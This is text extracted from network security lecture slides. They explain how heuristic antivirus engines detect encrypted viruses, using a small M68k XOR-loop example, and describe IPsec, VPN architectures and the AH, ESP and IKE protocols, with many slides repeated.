when a user starts a program, the scanner launches it insidethe virtual machine. If no virus-like behavior is observed, theprogram is allowed to start normally; if yes, the user is askedwhether the file is to be cleaned, deleted or quarantined
↓
modern scanners can detect new viruses for without signature
problem: heuristic scanning is computationally intensivereducing computers performance
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Logic Antivirus
Virtual Sandbox
to determine what actions a program performs, most heuristicscanners uses a sandboxed virtual machine
↓
when a user starts a program, the scanner launches it insidethe virtual machine. If no virus-like behavior is observed, theprogram is allowed to start normally; if yes, the user is askedwhether the file is to be cleaned, deleted or quarantined
↓
modern scanners can detect new viruses for without signature
problem: heuristic scanning is computationally intensivereducing computers performance
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Logic Antivirus
Components of a Heuristic Engine
1 variable/memory emulator
2 parser
3 flow analyzer
4 analyzer
5 disassembler/emulator
6 weight-based system and/or rule based system
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Logic Antivirus
Components of a Heuristic Engine
1 variable/memory emulator
2 parser
3 flow analyzer
4 analyzer
5 disassembler/emulator
6 weight-based system and/or rule based system
Firstly, we normalize the input file removing bad formatting,renaming the variables, ...
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Logic Antivirus
Components of a Heuristic Engine
1 variable/memory emulator
2 parser
3 flow analyzer
4 analyzer
5 disassembler/emulator
6 weight-based system and/or rule based system
Then, it finds for the entry point
• binary files: only one
• script-based files: usually more than one (all should bechecked)
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Logic Antivirus
Components of a Heuristic Engine
1 variable/memory emulator
2 parser
3 flow analyzer
4 analyzer
5 disassembler/emulator
6 weight-based system and/or rule based system
Main loop:
1 Extract one instruction
2 Identify the operation
3 Update sandbox variables environment
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Logic Antivirus
Components of a Heuristic Engine
1 variable/memory emulator
2 parser
3 flow analyzer
4 analyzer
5 disassembler/emulator
6 weight-based system and/or rule based system
Finally, when the complete program is analyzed, the foundfunctionality can be rated (or compared with a set of rules)and decide if the program is clean or not
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Logic Antivirus
Heuristic Engines and Encrypted Viruses
Historically, heuristic engines could only assess what wasvisible to them
↓
encrypted viruses caused them major problems
↓
modern heuristic engines try to identify decryption loops,break them, and assess the presence of an encryption loopaccording to the additional functionality that is detected
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Logic Antivirus
Heuristic Engines and Encrypted Viruses
Historically, heuristic engines could only assess what wasvisible to them
↓
encrypted viruses caused them major problems
↓
modern heuristic engines try to identify decryption loops,break them, and assess the presence of an encryption loopaccording to the additional functionality that is detected
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Logic Antivirus
Heuristic Engines and Encrypted Viruses
Historically, heuristic engines could only assess what wasvisible to them
↓
encrypted viruses caused them major problems
↓
modern heuristic engines try to identify decryption loops,break them, and assess the presence of an encryption loopaccording to the additional functionality that is detected
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Logic Antivirus
Heuristic Engines and Encrypted Viruses
So how does an AV scanner identify an encryption loop?The presence of any combination of the following
conditions/instructions could indicate an encryption loop:
• initialization of a pointer with a valid memory address;
• initialization of a counter;
• memory read operation depending on the pointer;
• logical operation on the memory read result;
• memory write operation with the result from the logicaloperation;
• manipulation of the counter;
• branching depending on the counter.
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Logic Antivirus
Heuristic Engines and Encrypted Viruses
So how does an AV scanner identify an encryption loop?The presence of any combination of the following
conditions/instructions could indicate an encryption loop:
• initialization of a pointer with a valid memory address;
• initialization of a counter;
• memory read operation depending on the pointer;
• logical operation on the memory read result;
• memory write operation with the result from the logicaloperation;
• manipulation of the counter;
• branching depending on the counter.
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Logic Antivirus
Encryption loop example (M68k assembler)
Decryption with eor and key 1Lea test(pc),a0Move.l #10, d0 ;counter.loopmove.b (a0), d1eor.b #1, d1 ;xor with key equal to 1move.b d1,(a0)+ ;move the offsetsubq.l #1,d0 ;update the counterbne.s .loop ;if d0 is not 0 jump to .loop
When the loop finishes the function pc is decrypt!
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Logic Antivirus
Alternative to Antivirus
• When computer programs are installed from originalsupports (manufacturer sealed CD, DVD), it is possible tocalculate the hash of the installed files or directory andkeep this hash in a safe way (electronically signed).
• Then, before applications are executed, the hash of thefiles is calculated again, and compared with the originalone, to check that no changes have been made, i.e. notinfection.
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction Logic Antivirus
Hot News
W32.Stuxnet is a worm that propagates on USB removable media drivesby taking advantage of ”Microsoft Windows Shortcut LNK FilesAutomatic File Execution Vulnerability”. It affects to the SCADA(Supervisory Control and Data Acquisition) systems deployed in lots ofindustrial systems, such as, nuclear or fuel refinement plants
Possible target: attack on Iran’s nuclear program
Online News
• Computer world UK
• ABC news
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples
Contents
1 Perimetral Security: Firewalls
2 Viruses, Worms and Trojans
3 Point to Point SecurityIntroductionVPN AchitecturesIPSec FundamentalsPractical Examples
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples
Contents
1 Perimetral Security: Firewalls
2 Viruses, Worms and Trojans
3 Point to Point SecurityIntroductionVPN AchitecturesIPSec FundamentalsPractical Examples
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples
Network Layer Security
Initially computer networks were used by academic researchersfor mail (or information in general) exchange
↓
Security was not very important
↓
Nowadays, this is not the case, millions of users use theInternet to access to their bank services, to buy products or
services, etc ...Then, we need to protect network communications at the layer
that is responsible for routing packets across networks
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples
Network Layers Description
TCP/IP is widely used throughout the world to providenetwork communications. TCP/IP communications are
composed of four layers that work together
• Application layer sends and receives data for particularapplications, such as DNS, HTTP and SMTP
• Transport Layer provides connection-oriented (TCP) orconnectionless (UDP) services for transporting application layerservices between networks
• Network Layer routes packets across networks. Internet Protocol(IP) is the fundamental protocol
• Data Link Layer handles communications on the physical networkcomponents. The best-known data link layer protocol is Ethernet
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples
The Need for Network Layer Security
Security controls exist for network communications at eachlayer of the TCP/IP model. The goal in each layer is
• Application layer Separate controls must be established for eachapplication. For example, Pretty Good Privacy (PGP) is commonlyused to encrypt e-mail messages (SMTP)
• Transport Layer Controls at this layer can be used to protect thedata in a single communication session between two hosts. Forexample (TLS / SSL) protocols secure HTTP traffic
• Network Layer Controls at this layer apply to all applications andare not application-specific. For example, IPSec secures all networkcommunications between two hosts without modifying applications
• Data Link Layer Controls are applied to all communications on aspecific physical link, such as a dedicated circuit between twobuildings or a dial-up modem connection to an ISP
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples
Internet Protocol Security (RFCs 4301 & 4309)
IPSec is the most commonly used network layer security control. IPsec isa framework of open standards for ensuring private communications over
IP networks. Depending on its implementation, it can provide anycombination of the following types of protection:
• Confidentiality. IPsec can ensure that data cannot be read byunauthorized parties. This is accomplished by encrypting data usinga cryptographic algorithm and a secret key
• Integrity. IPsec can determine if data has been changed duringtransit. Data integrity can be assured by generating a messageauthentication code (MAC) value, a cryptographic data checksum
• Peer Authentication. Each IPsec endpoint confirms the identityof the other IPsec endpoint, ensuring that the network traffic anddata is being sent from the expected host
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples
Internet Protocol Security (RFCs 4301 & 4309)
IPSec is the most commonly used network layer security control. IPsec isa framework of open standards for ensuring private communications over
IP networks. Depending on its implementation, it can provide anycombination of the following types of protection:
• Replay Protection. The same data is not delivered multiple times,and data is not delivered out of order. However, IPsec does notensure that data is delivered in the exact order in which it is sent
• Traffic Analysis Protection. A person monitoring the traffic doesnot know which parties are communicating, how oftencommunications are occurring, or how much data is beingexchanged. However, the number of packets can be counted.
• Access Control. IPsec endpoints can perform filtering to ensurethat only authorized IPsec users can access particular networkresources
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples
Virtual Private Networking (VPN)
The most common use of IPsec implementations is providingVirtual Private Networking (VPN) services
A VPN is a virtual network, built on top of existing physicalnetworks, that can provide a secure communications
mechanism for data and IP information transmitted betweennetworks
↓
As VPNs can be used over the Internet, they facilitate thesecure transfer of sensitive data across public networks
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples
VPN Advantages
• VPNs are often less expensive than alternatives such asdedicated private communications lines (e.g. X.25 lines)
• VPNs can also provide flexible solutions, such as securingcommunications between remote telecommuters (remoteworker) and the organization’s servers, regardless ofwhere the telecommuters are placed
• A VPN can even be established within a single network toprotect particularly sensitive communications from otherparties on the same network (e.g. servers administration)
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples
VPN & Cryptography
VPNs can use both private and public key cryptography
• Private key cryptography uses the same key for bothencryption and decryption, (e.g. DES, 3DES, AES, ...). Itis used for protecting the actual data because of itsrelative efficiency
• Public key cryptography uses separate keys forencryption and decryption, or to digitally sign and verify asignature (e.g. RSA, ...). It is used to authenticate theidentities of both parties
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples
Contents
1 Perimetral Security: Firewalls
2 Viruses, Worms and Trojans
3 Point to Point SecurityIntroductionVPN AchitecturesIPSec FundamentalsPractical Examples
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples
Gateway-to-Gateway Architecture
IPsec-based VPNs are often used to provide secure networkcommunications between two networks by deploying a VPN gateway onto
each network and establishing a VPN connection between them.
Usually, to facilitate VPN connections, one of the VPN gateways issues arequest to the other to establish an IPsec connection. Routing on each
network is configured so that as hosts on one network need tocommunicate with hosts on the other network, their network traffic is
automatically routed through the IPsec connection
This is the easiest VPN model to implement, in terms of user and hostmanagement
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples
Host-to-Gateway Architecture
This model is used to provide secure remote access. The organizationdeploys a VPN gateway onto their network; each remote access user thenestablishes a VPN connection between his/her host and the VPN gateway
IPsec connections are created as needed for each individual VPN user.The user is typically asked by the VPN gateway to authenticate before
the connection can be established
The host-to-gateway model is somewhat complex to implement andmaintain in terms of user and host
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples
Host-to-Host Architecture
This is the least commonly used VPN architecture. It is typically used forspecial purpose needs, such as system administrators performing remote
management of a single server.
This model is the only one that provides protection for data throughoutits transit. This can be a problem, because packet firewalls, IDS, andother devices cannot be placed to inspect the decrypted data, which
effectively circumvents certain layers of security
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples
Model Comparison
Feature G-to-G H-to-G H-to-HProvides protection between
No N/A N/Aclient and local gateway
Provides protection betweenYes Yes Yes
VPN endpoints
Protection between remote gatewayNo No N/A
and remote server (behind gateway)
Transparent to users Yes No NoTransparent to servers Yes Yes No
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples
Contents
1 Perimetral Security: Firewalls
2 Viruses, Worms and Trojans
3 Point to Point SecurityIntroductionVPN AchitecturesIPSec FundamentalsPractical Examples
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples
IPSec Components
IPsec is a collection of protocols that assist in protectingcommunications over IP networks working together in various
combinations to provide protection for communications
Main protocols
• Authentication Header (AH). It provides integrity forpackets headers
• Encapsulating Security Payload (ESP). It providesauthentication and encryption services
• Internet Key Exchange (IKE). It negotiates, createsand manges security associations (AS)
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples
Authentication Header (AH)
AH provides integrity protection for packet headers and data,as well as user authentication. It can optionally provide replayprotection and access protection. AH cannot encrypt any
portion of packets.
It is debatable its functionality since ESP also providesauthentication. However, AH is still of value because AH can
authenticate portions of packets that ESP cannot
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples
AH Modes
AH provides integrity protection for the entire packet,regardless of which mode is used.
• Tunnel mode: AH creates a new IP header for eachpacket. It is used in gateways VPNsNew IP
AH HeaderOriginal IP Transport and Application
Header Header Protocol Headers and DataAuthenticated (Integrity Protection)
• Transport mode: AH does not create a new IP header.Itis used in host-to-host VPNs
IPAH Header
Transport and Application ProtocolHeader Headers and Data
Authenticated (Integrity Protection)
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples
Integrity Protection Process
The first step of integrity protection is to create a hash byusing a keyed hash algorithm → a message authentication
code (MAC)
↓
keyed hash algorithms create a hash based on both a messageand a secret key shared by the two endpoints. The hash is
added to the packet, and it is sent to the recipient.
↓
The recipient can then regenerate the hash using the sharedkey and confirm that the two hashes match, providing integrity
protection for the packet
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples
Dynamic Header Fields
Certain IP header fields, such as time to live (TTL) and the IPheader checksum, are dynamic and may change during routine
communications
↓
If the hash is calculated on all the original IP header values,the recalculated hash will be different.
↓
To avoid this problem, IP header fields that may legitimatelychange in transit in an unpredictable manner are excludedfrom the integrity protection calculations
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples
NAT Problems
For the same reason as before AH is often incompatible withnetwork address translation (NAT) implementations
↓
The IP source and destination address fields are included inthe AH integrity protection calculations
↓
If these addresses are altered by a NAT device, the AHintegrity protection calculation made by the destination will
not match
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples
AH Header
Next Header Payload Length ReservedSecurity Parameters Index
Sequence NumberAuthentication Information
• Next Header. It contains the IP protocol number for the next packet payload.In tunnel mode, the payload is an IP packet, so the Next Header value is set to4 for IP-in-IP. In transport mode, the payload is usually a transport-layerprotocol, often TCP (6) or UDP (17)
• Payload Length. This field contains the length of the payload in 4-byteincrements, minus 2
• Reserved. This value is reserved for future use, so it should be set to 0• Security Parameters Index (SPI). Each endpoint has an arbitrarily chosen SPI
value, which acts as a unique identifier for the connection. The recipient usesthe SPI value, along with the destination IP address and (optionally) the IPsecprotocol type to determine which Security Association (SA) is being used
• Sequence Number. Each packet is assigned a sequential sequence number, andonly packets within a sliding window of sequence numbers are accepted. Thisprovides protection against replay attacks
• Authentication Information. This field contains the MAC output
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples
How AH works
Example
ICMP echo request packet with transport modeit only contains a single IP header
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples
How AH worksExampleAH header for the first four packets in an AH session between A and B
• SPI. A uses the hex value cdb59934 for the SPI in its packets, while host Buses the hex value a6b32c00 for the SPI in its packets. An AH connection iscomposed of two one-way connections, each with its own SPI
• SequenceNumber. Both hosts initially set the sequence number to 1, and bothincremented the number to 2 for their second packets
• Authentication Information. The authentication (integrity protection)information, a keyed hash based on the bytes in the packet, is different in eachpacket. It should be different even if only one byte in a hashed section changes
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples
Encapsulating Security Payload (ESP)
ESP is the second core IPsec security protocol. It providesboth encryption for packet payload data and authentication toprovide integrity protection (although not for the outermost IP
header)
↓
ESP’s encryption and authentication can be disabled
↓
ESP can be used to provide only encryption; encryption andintegrity protection; or only integrity protection
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples
ESP Modes
• Tunnel mode: It creates a new IP header for each packet. The new IP headerlists the endpoints of the ESP tunnel as the source and destination of thepacket.
New IP ESP Original IP Transport and Application ESP ESP Auth.Header Header Header Protocol Headers and Data Trailer (optional)
EncryptedAuthenticated (Integrity Protection)
It can encrypt and/or protect the integrity of both the data and the original IPheader. Encrypting the data protects it from being accessed or modified byunauthorized parties; encrypting the IP header conceals the nature of thecommunications, such as the actual source or destination of the packet. Ifauthentication is being used for integrity protection, each packet will have anESP Authentication section after the ESP trailer
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples
ESP Modes
• Transport mode: it uses the original IP header instead of creating a new one.
IP ESP Transport and Application ESP ESP Auth.Header Header Protocol Headers and Data Trailer (optional)
EncryptedAuthenticated (Integrity Protection)
It can only encrypt and/or protect the integrity of packet payloads and certainESP components, but not IP headers. As with AH, ESP transport mode isgenerally only used in host-to-host architectures. Also, transport mode isincompatible with NAT
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples
Encryption Process
ESP uses symmetric cryptography to provide encryption forIPsec packets. Both endpoints must use the same key to
encrypt and decrypt the packets.
↓
When an endpoint encrypts data, it divides the data into smallblocks (e.g. for the AES algorithm, 128 bits each), and thenperforms multiple sets of cryptographic operations using the
data blocks and shared key
↓
When the other endpoint receives the encrypted data, itperforms decryption using the same key and a similar process
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples
ESP Packet Fields
Each ESP header is composed of two fields:• SPI. Each endpoint of each IPsec connection has an arbitrarily chosen SPI
value, which acts as a unique identifier for the connection. The recipient usesthe SPI value, along with the destination IP address and (optionally) the IPsecprotocol type (in this case, ESP), to determine which SA is being used
• SequenceNumber. Each packet is assigned a sequential sequence number ,andonly packets within a sliding window of sequence numbers are accepted. Thisprovides protection against replay attacks
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples
ESP Packet Fields
The next part of the packet is the payload. It is composed of• Payload data. It is is encrypted,
• Initialization vector (IV). It is not encrypted.The IV is used during encryption.Its value is different in every packet, so if two packets have the same content,the inclusion of the IV will cause the encryption of the two packets to havedifferent results
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples
ESP Packet Fields
The third part of the packet is the ESP trailer, which contains• Padding. An ESP packet may optionally contain padding, which is additional
bytes of data that make the packet larger and are discarded by the packetsrecipient. Because ESP uses block ciphers for encryption, padding may beneeded so that the encrypted data is an integral multiple of the block size
• Padding Length. This number indicates how many bytes long the padding is
• Next Header. In tunnel mode, the payload is an IP packet, so the Next Headervalue is set to 4 for IP-in-IP. In transport mode, the payload is usually atransport-layer protocol, often TCP (6) or UDP (17)
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples
ESP Packet Fields
If ESP integrity protection is enabled, the ESP trailer is followed by an AuthenticationInformation field. As in AH header It contains the field contains the MAC output.Unlike AH, the MAC in ESP does not include the outermost IP header in itscalculations
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples
How ESP works
Example
It contains five sections: Ethernet header, IP header, ESPheader, encrypted data (payload and ESP trailer), and
(optionally) authentication information. From the encrypteddata, it is not possible to determine if this packet was
generated in transport mode or tunnel mode.
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples
How ESP works
Example
ESP header for the first four packets in an AH session betweenA and B
The SPI and Sequence Number fields work the same way inESP that they do in AH.
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples
Internet Key Exchange (IKE)
IKE protocol negotiates, creates, and manages securityassociations (SA). SA is a generic term for a set of values thatdefine the IPsec features and protections applied to aconnection
IKE protocol has two phases:
• Phase One Exchange → IPsec endpoints tosuccessfully negotiate a secure channel (IKE SA) throughwhich an IPsec SA can be negotiated
• Phase Two Exchange → The purpose of phase two isto establish an SA for the actual IPsec connection
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples
Phase One Exchange Modes
• Main mode. It negotiates the establishment of the IKESA through three pairs of messages
1 In the first pair of messages, each endpoint proposesparameters to be used for the SA
2 The second pair of messages performs a key exchangethrough Diffie-Hellman
3 In the third pair of messages, each endpoint isauthenticated to the other
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples
Phase One Exchange Modes
• Aggressive mode. It offers a faster alternative to mainmode. It negotiates the establishment of the IKE SAthrough three messages
1 In the first message, endpoint A sends all the protectionsuite parameters, as well as its portion of theDiffie-Hellman key exchange, a nonce, and its identity
2 In the second message, endpoint B sends the protectionsuite parameters, its portion of the Diffie-Hellman keyexchange, a nonce, its identity, and its authenticationpayload (through digital signature or hash)
3 In the third message, endpoint A sends itsauthentication payload
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples
Phase One Exchange
In the phase one, each endpoint proposes parameters for theSA. The four mandatory parameters are referred to asprotection suite
• Encryption Algorithm. This specifies the algorithm tobe used to encrypt data, e.g. DES, 3DES, AES, ...
• Integrity Protection Algorithm. This indicates whichkeyed hash algorithm should be used for integrityprotection, e.g. HMAC-MD5, HMAC-SHA-1, ...
• Diffie-Hellman (DH) Group. It is used to generate ashared secret for the endpoints in a secure manner.
• Authentication Method. There are several possiblemethods for authenticating the two endpoints (Pre-sharedKeys, Digital Signatures, ... )
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples
Phase Two Exchange
The purpose of phase two is to establish an SA for the actualIPsec connection (IPSec SA). IPSec SA connection is createdusing three messages:
• In the first message, endpoint A sends keys, nonces, andIPsec SA parameter suggestions. The nonces are ananti-replay measure
• In the second message, endpoint B sends keys, nonces,and IPsec SA parameter selections, plus a hash forauthentication
• In the third message, endpoint A sends a hash forauthentication
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples
Contents
1 Perimetral Security: Firewalls
2 Viruses, Worms and Trojans
3 Point to Point SecurityIntroductionVPN AchitecturesIPSec FundamentalsPractical Examples
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples
ESP in a Gw-to-Gw Architecture
The goal is to establish an IPsec connection that providesencryption and non complete integrity protection servicesbetween endpoints (gateways) A and B. Initially, we have tocreate an IKE SA, as follows:
1 Endpoint A creates and sends a regular (non-IPsec)packet that has a destination address of endpoint B
2 Network A routes the packet to gateway A
3 Gateway A receives the packet and performs NAT,altering the packet’s source IP address
4 Gateway A initiates an IKE SA negotiation with GatewayB using either main mode or aggressive mode. At the endof the negotiation, the IKE SA is created
Jordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples
ESP in a Gw-to-Gw ArchitectureThe next step is to create the IPsec SA, as follows:
5 GW A uses the parameters set in the IKE SA to initiate anIPsec SA negotiation with GW B. ESP tunnel mode is used
6 Once the two IPsec SAs are created, gateway A finishesprocessing the packet sent by endpoint A in the step 1:
1 GW A modifies the packet in accordance with the SAparameters: A new IP packet header is added (sourceIP: GW A and destination IP: GW B), encrypting thedata and adding the authentication information
2 Gateway A then sends the packet to Gateway B3 GW B receives the packet and uses the SPI value in the
unencrypted ESP header to determine the SAparameters. GW B processes and validates the packet:remove the additional IP header, check the integrity anddecrypt the original payload
4 GW B sends the packet to endpoint BJordi Nin 2 - Network Security and Protection
Firewalls Viruses PPS Introduction VPN Achitectures IPSec Examples
AH and ESP in a Gw-to-Gw Architecture
The goal is to establish an IPsec connection that providesencryption and complete integrity protection (includingheaders) services between endpoints (gateways) A and B
Steps 1-4 are identically to the previous example
5 Gateway A uses the parameters set in the IKE SA toinitiate an IPsec SA negotiation with gateway B for theAH service. The IKE SA provides protection for thenegotiation of the AH tunnel mode
6 Step 5 is repeated to negotiate the SAs for the ESPservice
Jordi Nin 2 - Network Security and Protection